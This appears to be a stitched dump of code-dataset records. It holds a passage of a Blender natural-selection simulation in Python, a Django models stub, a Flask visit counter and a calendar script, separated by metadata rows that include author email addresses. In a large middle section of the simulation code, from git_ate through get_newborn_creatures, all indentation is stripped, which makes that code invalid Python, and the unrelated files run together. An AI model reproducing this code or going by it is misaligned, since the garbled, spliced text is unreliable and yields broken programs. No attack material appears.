            mix = (spd - range_floor) / SPEED_PER_COLOR
            #color = mix_colors(COLORS_SCALED[6], COLORS_SCALED[4], mix)
            color = mix_colors(COLORS_SCALED[7], COLORS_SCALED[2], mix)
        elif spd < 1:
            #Blue to green
            range_floor = 1 - SPEED_PER_COLOR
            mix = (spd - range_floor) / SPEED_PER_COLOR
            #color = mix_colors(COLORS_SCALED[4], COLORS_SCALED[3], mix)
            color = mix_colors(COLORS_SCALED[2], COLORS_SCALED[6], mix)
        elif spd < 1 + SPEED_PER_COLOR:
            #Green to yellow
            range_floor = 1
            mix = (spd - range_floor) / SPEED_PER_COLOR
            color = mix_colors(COLORS_SCALED[6], COLORS_SCALED[4], mix)
            #color = mix_colors(COLORS_SCALED[3], COLORS_SCALED[5], mix)
        elif spd < 1 + 2 * SPEED_PER_COLOR:
            #Yellow to orange
            range_floor = 1 + SPEED_PER_COLOR
            mix = (spd - range_floor) / SPEED_PER_COLOR
            color = mix_colors(COLORS_SCALED[4], COLORS_SCALED[3], mix)
            #color = mix_colors(COLORS_SCALED[3], COLORS_SCALED[5], mix)
        elif spd < 1 + 3 * SPEED_PER_COLOR:
            #Orange to Red
            range_floor = 1 + 2 * SPEED_PER_COLOR
            mix = (spd - range_floor) / SPEED_PER_COLOR
            color = mix_colors(COLORS_SCALED[3], COLORS_SCALED[5], mix)
        elif spd < 1 + 4 * SPEED_PER_COLOR:
            #Red to white
            range_floor = 1 + 3 * SPEED_PER_COLOR
            mix = (spd - range_floor) / SPEED_PER_COLOR
            color = mix_colors(COLORS_SCALED[5], COLORS_SCALED[1], mix)
        else:
            color = COLORS_SCALED[1]
        apply_material(obj, 'creature_color1')
        bobj.color_shift(
            duration_time = None,
            color = color,
            start_time = time - 1 / FRAME_RATE,
            shift_time = 1 / FRAME_RATE,
            obj = obj
        )
        '''
        apply_material(obj, 'creature_color3')
        #Add speed property to bobject for reference when reusing bobjects
        bobj.speed = spd
#Not actually used?
def git_ate(self, **kwargs):
diffs = super().git_ate(**kwargs)
#When a creature is eaten, it corrects the position of the things it has
#already eaten that day to offset the effect the grandparent relationship
start_time = kwargs['start_time']
has_eaten = self.days[-1].has_eaten
if len(has_eaten) > 0 and has_eaten[-1] is not None:
for eaten in has_eaten[-1]:
corrected_loc = []
for i, x in enumerate(eaten.bobject.ref_obj.location):
corrected_loc.append(x - diffs[0][i])
corrected_rot = []
for i, x in enumerate(eaten.bobject.ref_obj.rotation_euler):
corrected_rot.append(x - diffs[1][i])
try:
#Change location and rotation
eaten.bobject.move_to(
start_time = start_time,
end_time = start_time + 1 / FRAME_RATE,
new_location = corrected_loc,
new_angle = corrected_rot
)
except:
print(corrected_loc)
print(corrected_rot)
raise()
def is_ancestor(self, creature):
x = creature
while x.parent != None:
if x.parent == self:
return True
x = x.parent
return False
class NaturalSim(object):
"""docstring for NaturalSim."""
def __init__(
self,
food_count = 10,
dimensions = WORLD_DIMENSIONS,
day_length = DEFAULT_DAY_LENGTH,
mutation_chance = MUTATION_CHANCE,
initial_creatures = None,
mutation_switches = {
'speed' : False,
'size' : False,
'sense' : False,
'altruist' : False,
'green_beard' : False,
'gbo' : False,
'a_gb' : False,
'kin_altruist' : False,
'kin_radius' : False,
},
initial_energy = STARTING_ENERGY,
**kwargs
):
self.food_count = food_count
self.initial_energy = initial_energy
self.dimensions = dimensions
self.day_length = day_length
self.mutation_chance = mutation_chance
self.date_records = []
self.mutation_switches = mutation_switches
print(self.mutation_switches)
self.initial_creatures = []
if isinstance(initial_creatures, list):
self.initial_creatures = initial_creatures
elif isinstance(initial_creatures, int):
for i in range(initial_creatures):
self.initial_creatures.append(
Creature(
size = 1 ,#+ randrange(-5, 6) * MUTATION_VARIATION,
speed = 1 ,#+ randrange(-5, 6) * MUTATION_VARIATION,
sense = 1 ,#+ randrange(-5, 6) * MUTATION_VARIATION
)
)
elif initial_creatures == None:
num_creatures = math.floor(self.food_count * 1 / 5)
for i in range(num_creatures):
self.initial_creatures.append(
Creature(
size = 1,# + randrange(-5, 6) * MUTATION_VARIATION,
speed = 1,# + randrange(-5, 6) * MUTATION_VARIATION,
sense = 1,# + randrange(-5, 6) * MUTATION_VARIATION
)
)
#Code for having a distribution of starting stats
"""
step = 2 #Shortcut for messing with set of initial creatures.
for i in range(-1, 2, step):
for j in range(-1, 2, step):
for k in range(-1, 2, step):
#For some reason, I decided I wanted to make initial
#distributions based on colors. /shrug
self.initial_creatures.append(
Creature(
size = 1 + SPEED_PER_COLOR * 0,# * i,
speed = 1 + SPEED_PER_COLOR * 0,# * j,
sense = 1 + SPEED_PER_COLOR * 0,# * k,
)
)
self.initial_creatures.append(
Creature(
size = 1 + SPEED_PER_COLOR * 0,# * i,
speed = 1 + SPEED_PER_COLOR * 0,# * j,
sense = 1 + SPEED_PER_COLOR * 0,# * k,
)
)
"""
for creature in self.initial_creatures:
creature.world = self
def gen_food(self):
food = []
for i in range(self.food_count):
food.append(
Food(
world_location = [
uniform(-self.dimensions[0], self.dimensions[0]),
uniform(-self.dimensions[1], self.dimensions[1]),
2
],
world = self
)
)
return food
def get_newborn_creatures(self, parents = None):
if parents == None:
raise Warning('Must define parents for get_newborn_creatures')
babiiieeesss = []
for par in parents:
if len(par.days[-1].has_eaten[-1]) > 1:
reproduction_chance = 1
elif len(par.days[-1].has_eaten[-1]) > 0:
reproduction_chance = par.days[-1].has_helped * HELP_REP_BOOST
if reproduction_chance > 0:
print('Reproduction chance is ' + str(reproduction_chance) + ' because I helped!')
else:
reproduction_chance = 0
if random() < reproduction_chance:
speed_addition = 0
if self.mutation_switches['speed'] == True:
if random() < self.mutation_chance:
speed_addition = randrange(-1, 2, 2) * MUTATION_VARIATION
size_addition = 0
if self.mutation_switches['size'] == True:
if random() < self.mutation_chance:
size_addition = randrange(-1, 2, 2) * MUTATION_VARIATION
sense_addition = 0
if self.mutation_switches['sense'] == True:
if random() < self.mutation_chance:
sense_addition = randrange(-1, 2, 2) * MUTATION_VARIATION
child_altruist = False
if self.mutation_switches['altruist'] == True:
if random() < self.mutation_chance:
child_altruist = not par.altruist
else:
child_altruist = par.altruist
child_beard = False
if self.mutation_switches['green_beard'] == True:
if random() < self.mutation_chance:
child_beard = not par.green_beard
else:
child_beard = par.green_beard
child_gbo = False
if self.mutation_switches['gbo'] == True:
if random() < self.mutation_chance:
child_gbo = not par.gbo
else:
child_gbo = par.gbo
child_a_gb = False
if self.mutation_switches['a_gb'] == True:
if random() < self.mutation_chance:
child_a_gb = not par.a_gb
else:
child_a_gb = par.a_gb
child_kin_altruist = False
if self.mutation_switches['kin_altruist'] == True:
if random() < self.mutation_chance:
child_kin_altruist = not par.kin_altruist
else:
child_kin_altruist = par.kin_altruist
kin_addition = 0
if self.mutation_switches['kin_radius'] == True:
if random() < self.mutation_chance * 1.73:
#Increase chance by a factor of root 3. Makes it so
#expected trait distance change is equal to expected
#kin radius change.
kin_addition = randrange(-1, 2, 2) * MUTATION_VARIATION
if par.kin_radius + kin_addition < 0:
kin_addition = 0
baby = Creature(
parent = par,
world = par.world,
speed = par.speed + speed_addition,
size = par.size + size_addition,
sense = par.sense + sense_addition,
altruist = child_altruist,
green_beard = child_beard,
a_gb = child_a_gb,
gbo = child_gbo,
kin_altruist = child_kin_altruist,
kin_radius = par.kin_radius + kin_addition,
)
par.children.append(baby)
babiiieeesss.append(baby)
return babiiieeesss
    def sim_next_day(
        self,
        save = False,
        filename = None,
        filename_seed = None,
        anim_durations = DEFAULT_ANIM_DURATIONS,
        custom_creature_set = None #For stringing separate sims together
    ):
        """Initialize date record"""
        #Simulate one full day: build the creature list (survivors plus
        #newborns), scatter food, step every creature until the day ends,
        #then mark deaths, trim the day length for animation, and gather
        #altruism statistics into the day's record dict.
        date = len(self.date_records)
        print("Beginning sim for day " + str(date))
        if custom_creature_set == None:
            if date == 0:
                creatures = self.initial_creatures
            else:
                #Survivors of yesterday plus their newborns
                creatures = [x for x in self.date_records[-1]['creatures'] if x.days[-1].dead == False]
                creatures += self.get_newborn_creatures(parents = creatures)
        else:
            creatures = custom_creature_set
        #Set day length based on how long the longest creature can go
        day_length = 0
        for cre in creatures:
            stamina = self.initial_energy / (cre.energy_cost)
            if stamina > day_length:
                day_length = math.ceil(stamina)
        date_dict = {
            'date' : date,
            'food_objects' : self.gen_food(),
            'creatures' : creatures,
            'day_length' : day_length, #number of steps in day to show all creatures
            'anim_durations' : deepcopy(anim_durations),
            'food_given_away': 0,
            'food_giving_attempts' : 0,
            'martyrs' : 0
        }
        self.date_records.append(date_dict)
        """print()
        for food in date_dict['food_objects']:
            print(food.world_location)
        print()"""
        """Conduct sim"""
        for cre in creatures:
            cre.new_day(date = date)
        for t in range(date_dict['day_length']):
            for cre in creatures:
                #take step
                cre.take_step()
        #At end of day, see which creatures die
        #Also shorten day if all creatures are home or dead before the end
        latest_action = 0
        for cre in date_dict['creatures']:
            day = None
            bobj = cre.bobject
            #Find this creature's CreatureDay for today
            for candidate_day in cre.days:
                if candidate_day.date == date:
                    day = candidate_day
                    break
            if day.dead == False:
                #Not enough food
                if len(day.has_eaten[-1]) == 0:
                    #print(str(cre) + " didn't eat enough")
                    day.dead = True
                    was_samaritan = False
                    for sta in day.states:
                        if sta == 'samaritan':
                            was_samaritan = True
                    if was_samaritan == True:
                        print("I had zero food after being a samaritan, somehow!")
                #Didn't make it home
                if (abs(day.locations[-1][0]) < self.dimensions[0] and \
                abs(day.locations[-1][1]) < self.dimensions[1]):
                    #print(str(cre) + " didn't make it home")
                    day.dead = True
                    was_samaritan = False
                    for sta in day.states:
                        if sta == 'samaritan':
                            was_samaritan = True
                    if was_samaritan == True:
                        print("I didn't make it home after being a samaritan!")
            '''was_samaritan = False
            for sta in day.states:
                if sta == 'samaritan':
                    was_samaritan = True
            if was_samaritan == True:
                print("I was a samaritan!")'''
            #Shorten for animation
            if day.death_time != None and day.death_time > latest_action:
                latest_action = day.death_time
                #print('New day length: ' + str(latest_action))
            if day.home_time != None and day.home_time > latest_action:
                latest_action = day.home_time
                #print('New day length: ' + str(latest_action))
        #print(date_dict['date'], latest_action)
        date_dict['day_length'] = latest_action
        #Gather info on altruism in previous day
        #Also check whether a creature is there more than once
        documented_creatures = []
        for cre in date_dict['creatures']:
            if cre in documented_creatures:
                raise Warning('Date dict creature list has duplicate creatures')
            documented_creatures.append(cre)
            day = cre.days[-1]
            ##Food given away
            date_dict['food_given_away'] += day.has_helped
            ##Attempts
            #Count each contiguous run of 'samaritan' states as one attempt
            states = day.states
            was_samaritan = False
            for i in range(1, len(states)):
                if states[i] == 'samaritan':
                    was_samaritan = True
                    if states[i-1] != 'samaritan':
                        date_dict['food_giving_attempts'] += 1
            if was_samaritan == True and day.dead == True:
                date_dict['martyrs'] += 1
                print('Recorded martyr')
        if save == True:
            self.save_sim_result(filename, filename_seed)
    def save_sim_result(self, filename, filename_seed):
        """Pickle this sim into SIM_DIR.

        The output name is chosen by precedence: `filename` verbatim,
        else the first unused `<filename_seed>_<k>` in SIM_DIR, else a
        "NAT<timestamp>" fallback.  Raises Warning if the resolved
        path already exists.
        """
        if filename != None:
            name = filename
        elif filename_seed != None:
            k = 0
            directory = os.fsencode(SIM_DIR)
            # Probe seed_0, seed_1, ... until no existing file (with its
            # 4-char extension stripped) matches the candidate name.
            # NOTE(review): if every k up to len(listdir) is taken, the
            # loop can finish without setting `name`, causing a
            # NameError below -- confirm intended directory sizes.
            while k <= len(os.listdir(directory)):
                #print('looking in dir')
                name_to_check = str(filename_seed) + '_' + str(k)
                already_exists = False
                for existing_file in os.listdir(directory):
                    existing_file_name = os.fsdecode(existing_file)[:-4]
                    #print(name_to_check)
                    #print(existing_file_name)
                    if existing_file_name == name_to_check:
                        already_exists = True
                        #print(already_exists)
                if already_exists:
                    k += 1
                else:
                    name = name_to_check
                    break
        else:
            # No name hints given: timestamp-based fallback.
            now = datetime.datetime.now()
            name = "NAT" + now.strftime('%Y%m%dT%H%M%S')
        #name = 'test'
        result = os.path.join(
            SIM_DIR,
            name
        ) + ".pkl"
        if not os.path.exists(result):
            print("Writing simulation to %s" % (result))
            with open(result, "wb") as outfile:
                pickle.dump(self, outfile, pickle.HIGHEST_PROTOCOL)
        else:
            raise Warning(str(result) + " already exists")
class DrawnNaturalSim(Bobject):
    """Blender bobject that renders a NaturalSim's recorded days.

    `sim` may be a NaturalSim instance, the name of a pickled sim in
    SIM_DIR, or None (a fresh NaturalSim is built from **kwargs).
    """
    def __init__(
        self,
        *subbobjects,
        sim = None,
        save = False,
        loud = True,
        start_delay = 1,
        blender_units_per_world_unit = BLENDER_UNITS_PER_WORLD_UNIT,
        day_length_style = 'fixed_speed', #Can also be 'fixed_length'
        **kwargs
    ):
        super().__init__(*subbobjects, **kwargs)
        self.day_length_style = day_length_style
        if isinstance(sim, NaturalSim):
            self.sim = sim
        elif isinstance(sim, str):
            # Treat the string as a pickle filename inside SIM_DIR.
            result = os.path.join(
                SIM_DIR,
                sim
            ) + ".pkl"
            if loud:
                print(result)
            # NOTE(review): `input` shadows the builtin here.
            with open(result, 'rb') as input:
                if loud:
                    print(input)
                self.sim = pickle.load(input)
                if loud:
                    print("Loaded the world")
        elif sim == None:
            #I was previously passing on only certain kwargs, but I'm not sure
            #why I don't send them all. Makes it easier to use a new kwarg.
            """sim_kwargs = {}
            for param in ['food_count', 'dimensions', 'day_length']:
                if param in kwargs:
                    sim_kwargs[param] = kwargs[param]"""
            self.sim = NaturalSim(**kwargs)
        self.blender_units_per_world_unit = blender_units_per_world_unit
        #As written, changing this will change some proportions, since some
        #other constants depend on the default value
        self.start_delay = start_delay
        #self.reusable_food_bobjs = []
        # Pool of bobjects from dead creatures, reused for newborns.
        self.reusable_cre_bobjs = []
        # Template mesh that every food item copies.
        food_bobject_model = import_object(
            'goodicosphere', 'primitives',
            #world_location = [0, 0, 0],
            #location = [0, 0, 0],
            #scale = FOOD_SCALE
        )
        self.food_object_model = food_bobject_model.ref_obj.children[0]
        apply_material(self.food_object_model, 'color7')
    def animate_days(self, start_day, end_day):
        """Animate sim days start_day..end_day (inclusive).

        Each day runs four phases, advancing self.elapsed_time:
        dawn (place food), morning (place creatures), day (recorded
        movement and eating), night (hide the dead and leftover food).
        """
        if end_day == None:
            end_day = len(self.sim.date_records) - 1
        for i in range(start_day, end_day + 1):
            date_record = self.sim.date_records[i]
            print("Animating day " + str(i))
            """Place food"""
            print(" Placing food")
            # Gives each food item a bobject and staggers its appearance
            # across the dawn phase.
            def place_food():
                for j, food in enumerate(date_record['food_objects']):
                    delay = j * date_record['anim_durations']['dawn'] / len(date_record['food_objects'])
                    duration_frames = min(
                        OBJECT_APPEARANCE_TIME,
                        date_record['anim_durations']['dawn'] * FRAME_RATE - delay * FRAME_RATE
                    )
                    food.bobject = bobject.Bobject(
                        objects = [self.food_object_model.copy()],
                        scale = FOOD_SCALE
                    )
                    food.bobject.ref_obj.parent = self.ref_obj
                    '''if len(self.reusable_food_bobjs) == 0:
                        food.add_to_blender()
                        food.bobject.ref_obj.parent = self.ref_obj
                    else:
                        bobj = self.reusable_food_bobjs.pop()
                        bobj.scale = [FOOD_SCALE, FOOD_SCALE, FOOD_SCALE]
                        for cons in bobj.ref_obj.constraints:
                            cons.keyframe_insert(
                                data_path = 'influence',
                                frame = (self.start_time + self.elapsed_time + delay) * FRAME_RATE - 1
                            )
                            cons.influence = 0
                            cons.keyframe_insert(
                                data_path = 'influence',
                                frame = (self.start_time + self.elapsed_time + delay) * FRAME_RATE
                            )
                        food.bobject = bobj'''
                    starting_loc = scalar_mult_vec(
                        food.world_location,
                        self.blender_units_per_world_unit
                    )
                    #This line primes move_to to have food on first day start
                    #in the right place
                    #if i == 0:
                    food.bobject.ref_obj.location = starting_loc
                    '''food.bobject.move_to(
                        new_location = starting_loc,
                        start_time = self.start_time + self.elapsed_time + delay - 1 / FRAME_RATE,
                        end_time = self.start_time + self.elapsed_time + delay
                    )'''
                    food.bobject.add_to_blender(
                        appear_time = self.start_time + self.elapsed_time + delay,
                        transition_time = duration_frames
                    )
            place_food()
            """Place new creatures"""
            print(" Placing creatures")
            # First animated day: every creature gets a fresh bobject.
            # Later days: newborns reuse a pooled bobject of matching
            # speed when one is available.
            def place_creatures():
                duration_frames = min(
                    OBJECT_APPEARANCE_TIME,
                    date_record['anim_durations']['dawn'] * FRAME_RATE
                )
                if date_record['date'] == start_day:
                    #print(" Adding new creatures on initial day")
                    for cre in date_record['creatures']:
                        cre.add_to_blender(
                            appear_time = self.start_time + self.elapsed_time,
                            world = self,
                            transition_time = duration_frames
                        )
                        cre.bobject.ref_obj.parent = self.ref_obj
                else:
                    #print(" Looking to reuse creature objects")
                    for cre in date_record['creatures']:
                        if cre not in self.sim.date_records[i - 1]['creatures']:
                            #print(' Found a creature that isn\'t in previous day')
                            reusables = [x for x in self.reusable_cre_bobjs if x.speed == cre.speed]
                            #if len(self.reusable_cre_bobjs) > 0:
                            if len(reusables) > 0:
                                #print(' Reusing a bobject')
                                bobj = reusables[-1]
                                #bobj = self.reusable_cre_bobjs[-1]
                                #print()
                                #print(bobj.name)
                                #print([x.name for x in self.reusable_cre_bobjs])
                                self.reusable_cre_bobjs.remove(bobj)
                                #print([x.name for x in self.reusable_cre_bobjs])
                                #print()
                                location = scalar_mult_vec(
                                    cre.days[0].locations[0],
                                    self.blender_units_per_world_unit
                                )
                                rotation_euler = [0, 0, cre.days[0].headings[0]]
                                bobj.move_to(
                                    new_location = location,
                                    new_angle = rotation_euler,
                                    start_time = self.start_time + self.elapsed_time - 1 / FRAME_RATE,
                                    end_time = self.start_time + self.elapsed_time
                                )
                                bobj.scale = [cre.size * BASE_CREATURE_SCALE] * 3
                                bobj.add_to_blender(
                                    appear_time = self.start_time + self.elapsed_time,
                                    transition_time = duration_frames
                                )
                                # Eye scale visualizes the creature's sense trait.
                                eyes = []
                                for obj in bobj.ref_obj.children[0].children:
                                    if 'Eye' in obj.name:
                                        eyes.append(obj)
                                for eye in eyes:
                                    eye.keyframe_insert(data_path = 'scale', frame = (self.start_time + self.elapsed_time) * FRAME_RATE - 1)
                                    eye.scale = [
                                        cre.sense,
                                        cre.sense,
                                        cre.sense,
                                    ]
                                    eye.keyframe_insert(data_path = 'scale', frame = (self.start_time + self.elapsed_time) * FRAME_RATE)
                                cre.bobject = bobj
                                #For some reason, this produces broken matertials
                                #So above, we just choose bobjects from creatures
                                #with the same speed. This takes more memory.
                                if cre.bobject.speed != cre.speed:
                                    cre.apply_material_by_speed(time = self.start_time + self.elapsed_time)
                            else:
                                #print(' Just making a new one')
                                cre.add_to_blender(
                                    appear_time = self.start_time + self.elapsed_time,
                                    world = self,
                                    transition_time = duration_frames
                                )
                                cre.bobject.ref_obj.parent = self.ref_obj
                """cres = date_record['creatures']
                for k in range(len(cres)):
                    for j in range(k):
                        if cres[k].bobject == cres[j].bobject:
                            #print(cres[k].bobject.name)
                            raise Warning('Two creatures are sharing a bobject')"""
                self.elapsed_time += date_record['anim_durations']['dawn'] + \
                                     date_record['anim_durations']['morning']
            place_creatures()
            """Step through time for current day"""
            print(" Animating movements")
            #print(date_record['day_length'])
            # Keyframes each creature's recorded location/heading per time
            # step and fires eat animations; advances elapsed_time by the
            # day and evening durations.
            def step_through_day():
                if self.day_length_style == 'fixed_speed':
                    time_step = DEFAULT_DAY_ANIM_DURATION / DEFAULT_DAY_LENGTH
                elif self.day_length_style == 'fixed_length':
                    if date_record['day_length'] == 0:
                        self.elapsed_time += date_record['anim_durations']['day']
                        self.elapsed_time += date_record['anim_durations']['evening']
                        return
                    time_step = 1 / date_record['day_length'] * date_record['anim_durations']['day']
                #Reduce number of keyframes when there's two or more per frame.
                #Number of time steps in one frame
                '''key_every_n_t = math.floor(1 / FRAME_RATE / time_step)
                if key_every_n_t < 1:
                    key_every_n_t = 1'''
                key_every_n_t = 1
                #print(str(date_record['date']) + ' ' + str(len(date_record['creatures'])))
                for t in range(date_record['day_length']):
                    time_of_day = t * time_step
                    anim_time = self.start_time + self.elapsed_time + time_of_day
                    frame = anim_time * FRAME_RATE
                    #TODO: check for food eating ties. Eh, maybe not.
                    for cre in date_record['creatures']:
                        day = None
                        obj = cre.bobject.ref_obj
                        day = [x for x in cre.days if x.date == date_record['date']][0]
                        #The [0] is just a way of plucking the value from a list
                        #which should be of length 1
                        #If None, the creature was eaten by this point
                        if day.locations[t] != None:
                            if t % key_every_n_t == 0:
                                obj.location = scalar_mult_vec(
                                    day.locations[t],
                                    self.blender_units_per_world_unit
                                )
                                obj.keyframe_insert(data_path = 'location', frame = frame)
                                obj.rotation_euler = [0, 0, day.headings[t]]
                                obj.keyframe_insert(data_path = 'rotation_euler', frame = frame)
                            #Old version that called git_ate on all new food,
                            #Even if it's food that was actually eaten previously
                            #by the creature currently being eaten. Resulted in
                            #unnecessary and problematic position corrections.
                            #Keeping as comment for now in case new version is
                            #problematic too.
                            """for food in day.has_eaten[t]:
                                if food not in day.has_eaten[t-1]:
                                    food.git_ate(
                                        eater = cre,
                                        start_time = anim_time,
                                        drawn_world = self,
                                        time_step = time_step
                                    )"""
                            #May cause bugs if a creature eats two things on the
                            #same time step.
                            if len(day.has_eaten[t]) > 0:
                                last_eaten = day.has_eaten[t][-1]
                                #was_eaten_not_shared = (last_eaten.was_shared == False or len(day.has_eaten) > 1)
                                #if last_eaten.was_shared == True:
                                #    print(last_eaten.bobject.ref_obj.name)
                                if last_eaten not in day.has_eaten[t-1] and \
                                    len(last_eaten.bobject.ref_obj.constraints) == 0:
                                    #was_eaten_not_shared == True:
                                    #Second condition avoids erroneous animations
                                    #for shared_food
                                    last_eaten.git_ate(
                                        eater = cre,
                                        start_time = anim_time,
                                        drawn_world = self,
                                        time_step = time_step
                                    )
                                    '''if isinstance(last_eaten, Creature):
                                        pass
                                        #There's another place where creatures are
                                        #added to the reusable pile.
                                        #self.reusable_cre_bobjs.append(last_eaten.bobject)
                                    else:
                                        self.reusable_food_bobjs.append(last_eaten.bobject)'''
                ''' Older version that didn't update date record if speed is fixed
                if self.day_length_style == 'fixed_length':
                    self.elapsed_time += date_record['anim_durations']['day']
                elif self.day_length_style == 'fixed_speed':
                    self.elapsed_time += date_record['day_length'] * time_step'''
                if self.day_length_style == 'fixed_speed':
                    date_record['anim_durations']['day'] = date_record['day_length'] * time_step
                self.elapsed_time += date_record['anim_durations']['day']
                self.elapsed_time += date_record['anim_durations']['evening']
            step_through_day()
            """Creatures that die should disappear."""
            """Along with food"""
            print(" Cleaning up")
            # Hides dead creatures (pooling their bobjects for reuse),
            # turns survivors around for the walk home, and removes
            # uneaten food at the night phase.
            def clean_up():
                duration_frames = min(
                    OBJECT_APPEARANCE_TIME,
                    date_record['anim_durations']['night'] * FRAME_RATE
                )
                for cre in date_record['creatures']:
                    day = None
                    for cons in cre.bobject.ref_obj.constraints:
                        if cons.influence == 1:
                            cons.keyframe_insert(
                                data_path = 'influence',
                                frame = (self.start_time + self.elapsed_time + date_record['anim_durations']['night']) * FRAME_RATE - 1
                            )
                            cons.influence = 0
                            cons.keyframe_insert(
                                data_path = 'influence',
                                frame = (self.start_time + self.elapsed_time + date_record['anim_durations']['night']) * FRAME_RATE
                            )
                    for candidate_day in cre.days:
                        if candidate_day.date == date_record['date']:
                            day = candidate_day
                            break
                    if day.dead == True:
                        cre.bobject.disappear(
                            disappear_time = self.start_time + self.elapsed_time + date_record['anim_durations']['night'],
                            #is_creature = True,
                            duration_frames = duration_frames
                        )
                        #if cre.is_eaten = False:
                        self.reusable_cre_bobjs.append(cre.bobject)
                    else:
                        cre.bobject.move_to(
                            new_angle = [
                                cre.bobject.ref_obj.rotation_euler[0],
                                cre.bobject.ref_obj.rotation_euler[1],
                                cre.bobject.ref_obj.rotation_euler[2] + math.pi
                            ],
                            start_time = self.start_time + self.elapsed_time,
                            end_time = self.start_time + self.elapsed_time + date_record['anim_durations']['night']
                        )
                        try: #This is for putting surviving creatures away if the
                            #next day is actually another sim.
                            next_day = self.sim.date_records[i + 1]
                            if cre not in next_day['creatures']:
                                cre.bobject.disappear(
                                    disappear_time = self.start_time + self.elapsed_time + date_record['anim_durations']['night'],
                                    #is_creature = True,
                                    duration_frames = duration_frames
                                )
                                self.reusable_cre_bobjs.append(cre.bobject)
                        except:
                            pass
                for food in date_record['food_objects']:
                    '''for cons in food.bobject.ref_obj.constraints:
                        cons.keyframe_insert(
                            data_path = 'influence',
                            frame = (self.start_time + self.elapsed_time + date_record['anim_durations']['night']) * FRAME_RATE - 1
                        )
                        cons.influence = 0
                        cons.keyframe_insert(
                            data_path = 'influence',
                            frame = (self.start_time + self.elapsed_time + date_record['anim_durations']['night']) * FRAME_RATE
                        )'''
                    if food.is_eaten == False:
                        food.bobject.disappear(
                            disappear_time = self.start_time + self.elapsed_time + date_record['anim_durations']['night'],
                            duration_frames = duration_frames# / 2
                        )
                        #self.reusable_food_bobjs.append(food.bobject)
                self.elapsed_time += date_record['anim_durations']['night']
            clean_up()
    def add_to_blender(
        self,
        start_delay = None,
        start_day = 0,
        end_day = None,
        **kwargs
    ):
        """Add the sim scene to Blender and animate the requested days.

        Requires kwargs['appear_time']; start_delay overrides the value
        set in __init__ when given.
        """
        if 'appear_time' not in kwargs:
            raise Warning('Need appear_time to add natural sim.')
        self.start_time = kwargs['appear_time']
        #Already set in __init__, but can be set again here
        if start_delay != None:
            self.start_delay = start_delay
        self.elapsed_time = self.start_delay #Will add to this as phases are
                                             #animated to keep them sequential
        #Adjust elapsed_time if start day not 0
        for i in range(start_day):
            day = self.sim.date_records[i]
            self.elapsed_time += day['anim_durations']['dawn'] + \
                                 day['anim_durations']['morning'] + \
                                 day['anim_durations']['day'] + \
                                 day['anim_durations']['evening'] + \
                                 day['anim_durations']['night']
        # Ground plane sized to the sim world dimensions.
        plane = import_object(
            'xyplane', 'primitives',
            scale = [
                self.sim.dimensions[0] * self.blender_units_per_world_unit,
                self.sim.dimensions[1] * self.blender_units_per_world_unit,
                0
            ],
            location = (0, 0, 0),
            name = 'sim_plane'
        )
        apply_material(plane.ref_obj.children[0], 'color2')
        self.add_subbobject(plane)
        super().add_to_blender(**kwargs)
        #execute_and_time(
        #    'Animated day',
        # NOTE(review): the trailing comma makes this a one-element tuple
        # expression; harmless, left over from the commented-out
        # execute_and_time wrapper.
        self.animate_days(start_day, end_day),
        #
| [
"syedfaizanhussain94@gmail.com"
] | syedfaizanhussain94@gmail.com |
cce3f02bf224ac4fd4a742c1e3447c7135e07cca | 7ad4ef003ca4555cfa0eb75045c7895fb817429a | /frontend/models.py | a0b6ced04602d3dd55fa976dc52d677aa66f3836 | [] | no_license | K-gns/MySite | c949d7e3e5693705a04dc0d60fe6410d7dff527b | ae26e6bc839eba1cdf1f724c991fb5e3a329b257 | refs/heads/main | 2023-05-21T21:38:38.886150 | 2021-06-13T15:43:28 | 2021-06-13T15:43:28 | 361,487,659 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 155 | py | from django.db import models
from django.conf import settings
from django.contrib.auth.models import User
from user_profile.models import MainCycle, Boost
| [
"kb465@mail.ru"
] | kb465@mail.ru |
d97172650fbf494f48bcbcba5842c6bd9d488899 | 28331cad1f61e41e6da2a4e221ec2776974e14a6 | /server.py | 2749887fbd22f20b8929d1c8185a689f3f0699c4 | [] | no_license | chaocharliehuang/FlaskCounter | 5ba0c0708460dafe80554b0dc712a6161cedae6e | f7c24378682f9f92036b48be29a148557cfecc25 | refs/heads/master | 2020-12-02T18:01:00.312014 | 2017-07-06T19:09:51 | 2017-07-06T19:09:51 | 96,461,798 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 503 | py | from flask import Flask, render_template, redirect, session
app = Flask(__name__)
# NOTE(review): hard-coded session-signing secret; fine for a demo, but
# load it from configuration/environment before deploying.
app.secret_key = 'secret'
@app.route('/')
def index():
    """Render the counter page, bumping the per-session visit count."""
    # session.get with a default collapses the original if/else: a missing
    # or falsy (0) count becomes 1, any other value is incremented.
    session['count'] = session.get('count', 0) + 1
    return render_template('index.html')
@app.route('/add2', methods=['POST'])
def add2():
    """Increment the session counter and redirect back to the index.

    Uses session.get with a default: the original `session['count'] += 1`
    raised KeyError when /add2 was POSTed before the index page had
    initialised the counter.
    """
    session['count'] = session.get('count', 0) + 1
    return redirect('/')
@app.route('/reset', methods=['POST'])
def reset():
    # Zero the session counter and send the browser back to the index.
    session['count'] = 0
    return redirect('/')
app.run(debug=True) | [
"chaocharliehuang@gmail.com"
] | chaocharliehuang@gmail.com |
2ec14bf6f34984991ab45b18102ceb8a9bd71ef3 | 7d1b5d963737926e323890e5a89fd4bcd9a925a2 | /test/year.py | a2ad37263ddc9a473804893b34701bf27db64992 | [] | no_license | zhaowan1/python | af1cccd507f86542e8a4adbcd7ed445db8f2abf0 | 3456bf9560caefc279f584e1652806712f30dc12 | refs/heads/master | 2020-03-11T01:41:51.053258 | 2018-04-16T07:04:34 | 2018-04-16T07:04:34 | 129,698,920 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 227 | py | '''
Created on 2018年4月10日
@author: Administrator
'''
#coding:utf-8
import calendar


def main():
    """Prompt for a year, then print that year's full monthly calendar."""
    print("Show a given years monthly calendar")
    print('')
    chosen_year = int(input("Enter the year"))
    print('')
    calendar.prcal(chosen_year)
    print('')


main()
| [
"457273410@qq.com"
] | 457273410@qq.com |
